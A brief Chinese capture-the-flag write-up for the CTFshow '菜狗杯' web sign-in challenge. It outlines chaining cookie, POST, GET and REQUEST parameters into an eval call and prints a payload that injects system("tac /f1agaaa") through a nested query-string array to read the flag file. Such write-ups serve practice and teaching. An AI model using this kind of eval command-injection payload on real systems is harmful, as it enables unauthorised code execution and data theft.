CTFshow-菜狗杯-web签到

题目来源

CTFshow

考点

参数传递的获取、url编码、eval命令执行

源码

解题思路

先是cookie传参

再是POST传参

再是GET传参

再是REQUEST传参

最后是eval命令执行

Payload

分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016

构造payload

?b=c&c[6][0][7][5][8][0][9][4][4]=system("tac /f1agaaa");
a=b
CTFshow-QQ%E7%BE%A4:=a

CTFshow-菜狗杯-web签到_第1张图片

得到flag

你可能感兴趣的:(CTF,WEB,参数传递,网络安全,web安全)